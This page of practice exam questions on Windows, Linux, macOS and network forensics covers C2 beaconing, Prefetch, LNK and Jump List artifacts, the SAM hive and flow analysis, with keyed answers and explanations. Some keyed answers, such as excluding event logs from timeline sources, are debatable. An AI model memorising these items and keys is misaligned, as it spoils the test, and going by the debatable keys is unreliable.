During a network forensic investigation, the analyst examines firewall logs and notices a large number of outbound connections from an internal server to various IP addresses on port 443 at regular intervals. The connections are all initiated by a process called 'svchost.exe' running from a non-standard location (C:\Windows\Temp). What is the MOST likely explanation?

A.The server is running a scheduled backup to an external cloud service
B.The server is performing legitimate Windows Update checks
C.The server is infected with malware that is beaconing to a command-and-control server
D.The server is being used as a proxy for internal users
AnswerC

The non-standard path and regular outbound connections are classic indicators of C2 beaconing.

Why this answer

svchost.exe from C:\Windows\Temp indicates a masquerading technique where malware names itself after a legitimate Windows process but runs from an unauthorized location. The outbound connections on port 443 are likely command-and-control (C2) traffic.

142
MCQmedium

A forensic analyst finds multiple Prefetch files in C:\Windows\Prefetch with recent timestamps. What is the primary value of Prefetch files in an investigation?

A.They store the user's web browsing history
B.They list all network connections made by the system
C.They record the first and last execution times of applications
D.They contain the actual content of user documents
AnswerC

Prefetch files track execution times and frequency.

Why this answer

Prefetch files contain the first run time, last run time, and run count of applications, plus loaded DLLs, useful for timeline analysis.

143
Multi-Selecthard

A forensic examiner is analyzing a Linux system suspected of being used as a C2 server. Which THREE artifacts should the examiner prioritize to find evidence of command execution and persistence? (Select three.)

Select 3 answers
A.~/.bash_history
B./var/log/syslog
C./etc/passwd
D./var/log/auth.log
E./etc/crontab
AnswersA, D, E

Correct. Contains typed commands.

Why this answer

Bash history shows commands typed by the user. Auth.log may show reverse shell connections. Cron jobs are common persistence mechanisms.

Syslog is too broad, and /etc/passwd shows users but not execution.

144
Multi-Selectmedium

Which TWO of the following artifacts are used for timeline analysis in digital forensics? (Select two.)

Select 2 answers
A.LNK files
B.HKLM\SYSTEM
C.Prefetch files
D.HKLM\SAM
E.Windows Event Logs
AnswersA, C

LNK files contain timestamps of file access, useful for timeline.

Why this answer

LNK files are correct because they record the last access timestamp of the file or application they point to, along with the volume serial number and path. This metadata allows a forensic examiner to reconstruct user activity and file access sequences during timeline analysis. Prefetch files are correct because they store the last run time, run count, and file paths of executed applications, enabling the creation of a chronological timeline of program execution on a Windows system.

Exam trap

EC-Council often tests the distinction between artifacts that provide direct timestamps for user activity (LNK, Prefetch) versus those that store static configuration or security data (HKLM\SYSTEM, HKLM\SAM), leading candidates to incorrectly select registry hives as timeline sources.

145
MCQeasy

In Windows forensics, which artifact is a database of metadata about files and applications accessed by the user, used to populate the 'Recent Items' and 'Quick Access' lists?

A.Jumplists
B.Prefetch files
C.LNK files
D.ShellBags
AnswerA

Jumplists track recent files and tasks per application.

Why this answer

Jumplists contain recently accessed files and application-specific destinations, used for Quick Access and Recent Items.

146
MCQmedium

A forensic investigator is examining a Mac system and wants to review recently accessed files and applications. Which macOS artifact is MOST useful for this purpose?

A.bash_history
B..plist files in ~/Library/Preferences/
C.Unified Logging (log stream)
D.FSEvents (/.fseventsd)
AnswerD

FSEvents records file system changes and can be used to reconstruct user activity.

Why this answer

FSEvents records file system events such as file creation, modification, and deletion. It is a key artifact for timeline analysis on macOS.

147
MCQeasy

In Windows registry forensics, which registry hive contains the SAM database storing local user account hashes?

A.HKLM\Security
B.HKLM\System
C.NTUSER.DAT
D.HKLM\Sam
AnswerD

Correct: HKLM\SAM contains the SAM database with local user account hashes.

Why this answer

The Security Account Manager (SAM) registry hive stores local user account information and password hashes, typically located at HKLM\SAM.

148
MCQmedium

A network forensic analyst captures traffic that includes the following Wireshark filter: "tcp.port == 22 and tcp.flags.syn == 1 and tcp.flags.ack == 0". What type of traffic is this filter selecting?

A.SSH traffic with payload
B.Outgoing SSH connection attempts
C.SSH key exchange
D.SSH established sessions
AnswerB

SYN packets to port 22 are connection initiation attempts, typically outgoing from the client.

Why this answer

The filter matches TCP packets to port 22 (SSH) with only the SYN flag set (SYN=1, ACK=0). These are the first packets in a TCP handshake, representing connection attempts.

149
MCQeasy

Which network forensic tool is BEST suited for analyzing NetFlow data to identify top talkers and detect anomalies?

A.SiLK
B.tcpdump
C.Nmap
D.Wireshark
AnswerA

SiLK is a flow analysis toolkit used for NetFlow data.

Why this answer

SiLK (System for Internet-Level Knowledge) is a set of NetFlow analysis tools designed for large-scale flow data analysis, including identifying top talkers and anomaly detection.

150
Multi-Selectmedium

A forensic analyst is examining a Windows system and wants to identify recently accessed files and programs. Which TWO artifacts should the analyst prioritize? (Select TWO.)

Select 2 answers
A.Jump Lists
B.Event ID 4624 logs
C.Prefetch files
D.System Restore points
E.SAM registry hive
AnswersA, C

Track recent documents and applications.

Why this answer

Prefetch files track application launches; Jump Lists track recently used files per application.

← PreviousPage 2 of 3 · 216 questions totalNext →

Ready to test yourself?

Try a timed practice session using only OS and Network Forensics questions.